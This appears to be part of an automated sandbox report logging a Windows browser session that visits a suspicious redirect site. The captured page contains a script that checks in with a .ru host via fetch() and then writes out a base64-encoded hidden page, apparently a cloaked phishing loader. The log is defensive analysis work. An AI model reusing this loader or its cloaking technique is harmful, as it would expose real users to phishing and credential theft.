                                                              2024-07-03 07:40:31 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                              2024-07-03 07:40:31 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 57 51 78 34 64 6b 45 59 44 45 53 4b 67 2b 41 73 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 36 65 32 61 37 65 38 36 38 38 61 38 61 61 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 4a 4d 76 4b 6e 47 2b 5a 70 34 4c 4a 68 46 44 56 76 62 51 4f 48 4f 69 49 4a 65 2b 75 54 4e 65 73 61 45 57 63 67 75 44 5a 51 4c 59 45 6e 41 32 46 79 38 66 77 45 46 76 62 2f 4d 51 31 71 63 6a 6a 64 57 6f 67 34 2b 73 30 63 35 69 2b 6c 49 6d 72 37 6e 46 30 48 33 58 63 62 44 4b 52 74 7a 6b 67 50 46 64 63 67 57 55 54 4a 36 57 33
                                                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: WQx4dkEYDESKg+As.2Context: a6e2a7e8688a8aae<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbJMvKnG+Zp4LJhFDVvbQOHOiIJe+uTNesaEWcguDZQLYEnA2Fy8fwEFvb/MQ1qcjjdWog4+s0c5i+lImr7nF0H3XcbDKRtzkgPFdcgWUTJ6W3
                                                              2024-07-03 07:40:31 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 57 51 78 34 64 6b 45 59 44 45 53 4b 67 2b 41 73 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 36 65 32 61 37 65 38 36 38 38 61 38 61 61 65 0d 0a 0d 0a
                                                              Data Ascii: BND 3 CON\QOS 56MS-CV: WQx4dkEYDESKg+As.3Context: a6e2a7e8688a8aae
                                                              2024-07-03 07:40:31 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                              Data Ascii: 202 1 CON 58
                                                              2024-07-03 07:40:31 UTC58INData Raw: 4d 53 2d 43 56 3a 20 5a 68 49 59 54 34 32 67 79 55 43 77 67 48 67 6f 42 68 39 52 37 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                              Data Ascii: MS-CV: ZhIYT42gyUCwgHgoBh9R7w.0Payload parsing failed.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.649724188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:31 UTC696OUTGET /2DUx/ HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              sec-ch-ua-platform: "Windows"
                                                              Upgrade-Insecure-Requests: 1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: navigate
                                                              Sec-Fetch-Dest: document
                                                              Referer: https://www.itanhangasaude.com.br/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:32 UTC1005INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:40:32 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Cache-Control: no-cache, private
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ENsTxDwu2HROkgrnNekb%2FgywkB5tLr9R5fJXYYmiPMGGQxt26qfVwXWDBAJsWoGmzwcRhAHI38yzTXyvgjw%2F5bH2twjBC4lZNzI0EYohK4mgu1qZ%2FjTkkonqDJaqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6Ii9RdnVXMlk4Q0pJOFlzbnA2bDRxWXc9PSIsInZhbHVlIjoia0llVG1KMVREc0xvbDVLeVR1Y2wrYTdaNjFmRlY4d2RBSFRacldCbHg4M0x2RWVaTncyMEtlV1JDYnlxejdjbTZUZzBRMmhTWHRpYzhxQlRkK2JkZzJxS1dLMWFRVUg5TEhPa1RBczRwaC9QbU94UFZCN3huU3ordDN3cHFpdWQiLCJtYWMiOiI3MTEwZTM5YzMwMTJmODU5ZWVlYWE3OTJjYWM2ZDkyODU1ZTEwMmJiNjZiNGQxODE4ZTM0YzE4YzczMWM0OGRiIiwidGFnIjoiIn0%3D; expires=Wed, 03-Jul-2024 09:40:31 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                              2024-07-03 07:40:32 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 5a 76 4f 45 70 47 53 46 64 43 51 6e 49 72 4d 7a 6b 72 65 6e 52 4e 63 31 64 51 4e 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 54 6b 56 46 5a 54 4e 53 65 55 52 35 63 30 49 77 61 57 78 56 4e 30 46 54 4f 47 6c 4f 52 47 74 58 55 79 39 6e 56 57 52 30 4e 47 68 4c 52 46 70 52 59 6e 46 6f 54 55 4a 6c 53 6a 68 6d 54 47 64 74 52 30 73 72 55 6e 56 53 54 54 64 4b 52 33 6c 32 51 6a 6c 78 59 30 51 30 4e 33 6c 48 4d 56 70 61 5a 46 51 30 64 31 6c 36 5a 46 6b 78 4b 30 31 6d 4e 30 74 4a 4d 6e 45 30 65 56 6c 35 56 30 64 61 65 6b 56 69 57 55 5a 4f 57 6a 4a 6d 51 30 70 35 59 6d 5a 47 55 6d 77 78 54 58 41 77 57 44 52 74 55 55 5a 56 55 6e 56 77 57 47 77
                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjZvOEpGSFdCQnIrMzkrenRNc1dQN3c9PSIsInZhbHVlIjoiTkVFZTNSeUR5c0IwaWxVN0FTOGlORGtXUy9nVWR0NGhLRFpRYnFoTUJlSjhmTGdtR0srUnVSTTdKR3l2QjlxY0Q0N3lHMVpaZFQ0d1l6ZFkxK01mN0tJMnE0eVl5V0daekViWUZOWjJmQ0p5YmZGUmwxTXAwWDRtUUZVUnVwWGw
                                                              2024-07-03 07:40:32 UTC1369INData Raw: 31 37 36 64 0d 0a 3c 73 63 72 69 70 74 3e 66 65 74 63 68 28 27 68 74 74 70 73 3a 2f 2f 4e 7a 44 39 32 2e 36 67 6e 69 75 36 38 2e 72 75 2f 35 35 37 35 39 36 38 32 30 32 34 36 31 34 38 35 33 38 38 38 36 35 35 36 35 44 75 47 7a 63 72 54 79 4f 5a 4c 46 4e 4c 44 49 59 53 56 58 5a 44 50 4f 4c 4c 44 53 45 44 4e 51 4d 53 46 27 2c 20 7b 0d 0a 6d 65 74 68 6f 64 3a 20 22 47 45 54 22 2c 0d 0a 7d 29 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 7b 0d 0a 72 65 74 75 72 6e 20 72 65 73 70 6f 6e 73 65 2e 74 65 78 74 28 29 0d 0a 7d 29 2e 74 68 65 6e 28 74 65 78 74 20 3d 3e 20 7b 0d 0a 69 66 28 74 65 78 74 20 3d 3d 20 30 29 7b 20 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f
                                                              Data Ascii: 176d<script>fetch('https://NzD92.6gniu68.ru/5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF', {method: "GET",}).then(response => {return response.text()}).then(text => {if(text == 0){ document.write(decodeURIComponent(escape(ato
                                                              2024-07-03 07:40:32 UTC1369INData Raw: 4e 43 6e 30 4e 43 69 4e 6b 57 47 46 74 62 47 74 70 52 58 68 7a 49 48 42 37 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 77 4f 32 31 68 63 6d 64 70 62 69 31 69 62 33 52 30 62 32 30 36 4d 58 4a 6c 62 54 74 39 44 51 6f 6a 5a 46 68 68 62 57 78 72 61 55 56 34 63 79 35 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 64 32 6c 6b 64 47 67 36 49 44 45 77 4d 43 55 37 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73 5a 57 5a 30 4f 69 42 32 59 58 49 6f 4c 53 31 69 63 79 31 6e 64 58 52 30 5a 58 49 74 65 43 77 67 4c 6a 63 31 63 6d 56 74 4b 54 74 74 59 58 4a 6e 61 57 34 74 63 6d 6c 6e 61 48 51 36 49 47 46 31 64 47 38 37 62 57
                                                              Data Ascii: NCn0NCiNkWGFtbGtpRXhzIHB7bWFyZ2luLXRvcDowO21hcmdpbi1ib3R0b206MXJlbTt9DQojZFhhbWxraUV4cy5jb250YWluZXJ7d2lkdGg6IDEwMCU7cGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bW
                                                              2024-07-03 07:40:32 UTC1369INData Raw: 4c 57 5a 68 62 57 6c 73 65 54 6f 67 59 58 4a 70 59 57 77 73 49 48 4e 68 62 6e 4d 74 63 32 56 79 61 57 59 37 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 6a 62 32 78 76 63 6a 6f 67 49 32 5a 6d 5a 6a 74 6a 62 32 78 76 63 6a 6f 67 49 7a 41 77 4d 44 74 77 59 57 52 6b 61 57 35 6e 4f 69 41 79 4d 48 42 34 4f 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 67 4d 54 68 77 65 44 74 76 64 6d 56 79 63 32 4e 79 62 32 78 73 4c 57 4a 6c 61 47 46 32 61 57 39 79 4f 69 42 6a 62 32 35 30 59 57 6c 75 4f 79 49 2b 44 51 6f 38 49 53 30 74 49 44 78 6b 61 58 59 2b 55 33 56 6a 59 32 56 7a 63 79 42 70 63 79 42 30 61 47 55 67 63 33 56 74 49 47 39 6d 49 48 4e 74 59 57 78 73 49 47 56 6d 5a 6d 39 79 64 48 4d 73 49 48 4a 6c 63 47 56 68 64 47 56 6b 49 47 52 68 65 53 42 70 62 69 42 68 62 6d 51
                                                              Data Ascii: LWZhbWlseTogYXJpYWwsIHNhbnMtc2VyaWY7YmFja2dyb3VuZC1jb2xvcjogI2ZmZjtjb2xvcjogIzAwMDtwYWRkaW5nOiAyMHB4O2ZvbnQtc2l6ZTogMThweDtvdmVyc2Nyb2xsLWJlaGF2aW9yOiBjb250YWluOyI+DQo8IS0tIDxkaXY+U3VjY2VzcyBpcyB0aGUgc3VtIG9mIHNtYWxsIGVmZm9ydHMsIHJlcGVhdGVkIGRheSBpbiBhbmQ
                                                              2024-07-03 07:40:32 UTC1369INData Raw: 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 45 74 4c 53 41 38 5a 47 6c 32 50 6c 4e 31 59 32 4e 6c 63 33 4d 67 61 58 4d 67 62 6d 39 30 49 47 6c 75 49 48 64 6f 59 58 51 67 65 57 39 31 49 47 68 68 64 6d 55 73 49 47 4a 31 64 43 42 33 61 47 38 67 65 57 39 31 49 47 46 79 5a 53 34 38 4c 32 52 70 64 6a 34 67 4c 53 30 2b 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 68 4c 53 30 67 50 47 52 70 64 6a 35 45 62 32 34 6d 49 7a 41 7a 4f 54 74 30 49 47 4a 6c 49 47 46 6d 63 6d 46 70 5a 43 42 30 62 79 42 6e 61 58 5a 6c 49 48 56 77 49 48 52 6f 5a 53 42 6e 62 32 39 6b 49 48 52 76 49 47 64 76 49 47 5a 76 63 69 42 30 61 47 55 67 5a 33 4a 6c 59 58 51 75 50 43 39 6b 61 58 59 2b 49 43 30 74
                                                              Data Ascii: jwvZGl2Pg0KPCEtLSA8ZGl2PlN1Y2Nlc3MgaXMgbm90IGluIHdoYXQgeW91IGhhdmUsIGJ1dCB3aG8geW91IGFyZS48L2Rpdj4gLS0+CjwvZm9ybT4NCjwvZGl2Pg0KPC9kaXY+DQo8L2Rpdj4NCjwhLS0gPGRpdj5Eb24mIzAzOTt0IGJlIGFmcmFpZCB0byBnaXZlIHVwIHRoZSBnb29kIHRvIGdvIGZvciB0aGUgZ3JlYXQuPC9kaXY+IC0t
                                                              2024-07-03 07:40:32 UTC529INData Raw: 5a 53 53 45 52 5a 55 55 64 4c 55 46 64 43 56 30 4e 56 52 30 64 58 56 46 4e 4f 53 6b 64 5a 56 6c 42 57 54 45 6c 44 57 6b 39 43 62 30 77 30 54 32 64 4a 65 47 4a 76 62 55 56 49 64 45 64 34 63 58 56 74 56 6d 78 78 64 58 70 6c 64 32 74 75 5a 47 64 6a 64 33 4e 6b 50 32 6c 79 63 57 46 79 64 6c 6c 4b 52 31 56 54 55 45 46 55 53 6c 5a 59 56 45 31 52 57 46 70 48 55 46 5a 42 56 31 52 54 53 6c 52 5a 52 30 6c 4f 51 30 5a 55 52 6c 64 48 51 30 70 4e 53 46 70 46 55 6b 5a 61 56 46 6c 4a 62 57 56 69 65 57 68 77 62 57 5a 6d 61 48 56 7a 63 32 5a 6b 59 32 31 33 5a 57 74 6a 62 6d 70 79 63 6d 68 6b 63 58 4a 35 62 6d 52 31 59 6e 56 74 64 48 42 33 59 32 67 6e 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 39 44 51 6f 67 49 43 41 67 66 53 6b 37 44 51 70 39 44 51 6f 38 4c 33 4e 6a 63
                                                              Data Ascii: ZSSERZUUdLUFdCV0NVR0dXVFNOSkdZVlBWTElDWk9Cb0w0T2dJeGJvbUVIdEd4cXVtVmxxdXpld2tuZGdjd3NkP2lycWFydllKR1VTUEFUSlZYVE1RWFpHUFZBV1RTSlRZR0lOQ0ZURldHQ0pNSFpFUkZaVFlJbWVieWhwbWZmaHVzc2ZkY213ZWtjbmpycmhkcXJ5bmR1YnVtdHB3Y2gnOw0KICAgICAgICB9DQogICAgfSk7DQp9DQo8L3Njc
                                                              2024-07-03 07:40:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              6192.168.2.64972340.115.3.253443
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:31 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 38 35 64 41 73 42 61 52 39 55 75 59 4f 56 65 6b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 64 36 61 38 39 63 37 35 66 31 64 36 63 37 63 0d 0a 0d 0a
                                                              Data Ascii: CNT 1 CON 305MS-CV: 85dAsBaR9UuYOVek.1Context: ed6a89c75f1d6c7c
                                                              2024-07-03 07:40:31 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                              2024-07-03 07:40:31 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 38 35 64 41 73 42 61 52 39 55 75 59 4f 56 65 6b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 64 36 61 38 39 63 37 35 66 31 64 36 63 37 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 4a 4d 76 4b 6e 47 2b 5a 70 34 4c 4a 68 46 44 56 76 62 51 4f 48 4f 69 49 4a 65 2b 75 54 4e 65 73 61 45 57 63 67 75 44 5a 51 4c 59 45 6e 41 32 46 79 38 66 77 45 46 76 62 2f 4d 51 31 71 63 6a 6a 64 57 6f 67 34 2b 73 30 63 35 69 2b 6c 49 6d 72 37 6e 46 30 48 33 58 63 62 44 4b 52 74 7a 6b 67 50 46 64 63 67 57 55 54 4a 36 57 33
                                                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 85dAsBaR9UuYOVek.2Context: ed6a89c75f1d6c7c<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbJMvKnG+Zp4LJhFDVvbQOHOiIJe+uTNesaEWcguDZQLYEnA2Fy8fwEFvb/MQ1qcjjdWog4+s0c5i+lImr7nF0H3XcbDKRtzkgPFdcgWUTJ6W3
                                                              2024-07-03 07:40:31 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 38 35 64 41 73 42 61 52 39 55 75 59 4f 56 65 6b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 64 36 61 38 39 63 37 35 66 31 64 36 63 37 63 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: 85dAsBaR9UuYOVek.3Context: ed6a89c75f1d6c7c<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                              2024-07-03 07:40:32 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                              Data Ascii: 202 1 CON 58
                                                              2024-07-03 07:40:32 UTC58INData Raw: 4d 53 2d 43 56 3a 20 57 70 65 43 70 33 66 77 43 30 36 31 71 75 46 30 42 39 4c 5a 6d 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                              Data Ascii: MS-CV: WpeCp3fwC061quF0B9LZmw.0Payload parsing failed.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.649725188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:32 UTC1318OUTGET /favicon.ico HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: image
                                                              Referer: https://vkwek.ckyucle.com/2DUx/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6Ii9RdnVXMlk4Q0pJOFlzbnA2bDRxWXc9PSIsInZhbHVlIjoia0llVG1KMVREc0xvbDVLeVR1Y2wrYTdaNjFmRlY4d2RBSFRacldCbHg4M0x2RWVaTncyMEtlV1JDYnlxejdjbTZUZzBRMmhTWHRpYzhxQlRkK2JkZzJxS1dLMWFRVUg5TEhPa1RBczRwaC9QbU94UFZCN3huU3ordDN3cHFpdWQiLCJtYWMiOiI3MTEwZTM5YzMwMTJmODU5ZWVlYWE3OTJjYWM2ZDkyODU1ZTEwMmJiNjZiNGQxODE4ZTM0YzE4YzczMWM0OGRiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjZvOEpGSFdCQnIrMzkrenRNc1dQN3c9PSIsInZhbHVlIjoiTkVFZTNSeUR5c0IwaWxVN0FTOGlORGtXUy9nVWR0NGhLRFpRYnFoTUJlSjhmTGdtR0srUnVSTTdKR3l2QjlxY0Q0N3lHMVpaZFQ0d1l6ZFkxK01mN0tJMnE0eVl5V0daekViWUZOWjJmQ0p5YmZGUmwxTXAwWDRtUUZVUnVwWGwiLCJtYWMiOiI4ODFkOTBjYjRmMWIxOTQxMDI0NWJmZmM2MDFhM2FhZGNjNjI4ODc0NWQwZGNiNDY5ZTRhZGUzOWVhZmVhMjk3IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:40:32 UTC639INHTTP/1.1 404 Not Found
                                                              Date: Wed, 03 Jul 2024 07:40:32 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Cache-Control: max-age=14400
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ntbk1%2B0p%2FKPbnMlpunK%2FF02vxwHxUZE18hSmg6Vb0qrDO1qETED2rd35kRiENcKsGxXLOLDj2AImaw2XunnKdVpn9pEm0zkIHs2vWLzhjlhx9Uq7jOEqVhvsUixkPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Vary: Accept-Encoding
                                                              alt-svc: h3=":443"; ma=86400
                                                              CF-Cache-Status: HIT
                                                              Age: 1348
                                                              Server: cloudflare
                                                              CF-RAY: 89d53a5f9edd8c23-EWR
                                                              2024-07-03 07:40:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.649727188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:33 UTC608OUTGET /5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF HTTP/1.1
                                                              Host: nzd92.6gniu68.ru
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Origin: https://vkwek.ckyucle.com
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:33 UTC610INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:40:33 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Access-Control-Allow-Origin: *
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lZooMoaAqw2GN85zunTjA4DfqtW5%2BCwGsGlbUUpJ9RdsJ7TvBbfme%2BzzKBYWFdEoGIKE%2BodehrD2tGa8OaPBqMPMKl2M49Dq1wav%2Fin%2FgaPe%2BS0e0zDw6WektvKxKj5JRPu3"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 89d53a631c898cc0-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-07-03 07:40:33 UTC6INData Raw: 31 0d 0a 30 0d 0a
                                                              Data Ascii: 10
                                                              2024-07-03 07:40:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.64972835.190.80.14434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:33 UTC536OUTOPTIONS /report/v4?s=ntbk1%2B0p%2FKPbnMlpunK%2FF02vxwHxUZE18hSmg6Vb0qrDO1qETED2rd35kRiENcKsGxXLOLDj2AImaw2XunnKdVpn9pEm0zkIHs2vWLzhjlhx9Uq7jOEqVhvsUixkPw%3D%3D HTTP/1.1
                                                              Host: a.nel.cloudflare.com
                                                              Connection: keep-alive
                                                              Origin: https://vkwek.ckyucle.com
                                                              Access-Control-Request-Method: POST
                                                              Access-Control-Request-Headers: content-type
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept-Encoding: gzip, deflate, br
